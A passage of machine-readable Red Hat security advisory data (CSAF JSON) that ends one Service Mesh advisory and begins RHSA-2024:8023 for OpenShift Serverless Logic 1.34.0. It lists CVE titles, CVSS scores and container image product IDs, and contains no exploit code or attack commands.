"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, ], }
RHSA-2024:8023
Vulnerability from csaf_redhat
Published
2024-10-14 00:59
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update & enhancements
Notes
Topic
Release of OpenShift Serverless Logic 1.34.0
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This release includes security, bug fixes, and enhancements.
Security Fix(es):
* axios: axios: Server-Side Request Forgery (CVE-2024-39338)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Release of OpenShift Serverless Logic 1.34.0\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "This release includes security, bug fixes, and enhancements.\n\nSecurity Fix(es):\n\n* axios: axios: Server-Side Request Forgery (CVE-2024-39338)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\nFor more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8023", url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2309758", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309758", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8023.json", }, ], title: "Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update & enhancements", tracking: { current_release_date: "2025-04-10T00:21:57+00:00", generator: { date: "2025-04-10T00:21:57+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:8023", initial_release_date: "2024-10-14T00:59:58+00:00", revision_history: [ { date: "2024-10-14T00:59:58+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-14T00:59:58+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:57+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "8Base-Openshift-Serverless-1.34", product: { name: "8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_serverless:1.34::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Serverless", }, { branches: [ { category: "product_version", name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", product: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", product_id: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", product_identification_helper: { purl: "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", product: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", product_id: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", product_identification_helper: { purl: "pkg:oci/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", product: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", product_id: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", product: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", product_id: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", product: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", product_id: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", product_identification_helper: { purl: "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8&tag=1.34.0-2", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", product: { name: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", product_id: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", product_identification_helper: { purl: "pkg:oci/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-management-console-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", product: { name: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", product_id: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", product_identification_helper: { purl: "pkg:oci/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", product: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", product_id: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", product_identification_helper: { purl: "pkg:oci/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", product: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", product_id: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", product_identification_helper: { purl: "pkg:oci/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", product: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", product_id: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", product_identification_helper: { purl: "pkg:oci/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8&tag=1.34.0-6", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", product: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", product_id: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", product_identification_helper: { purl: "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", product: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", product_id: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", product_identification_helper: { purl: "pkg:oci/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: 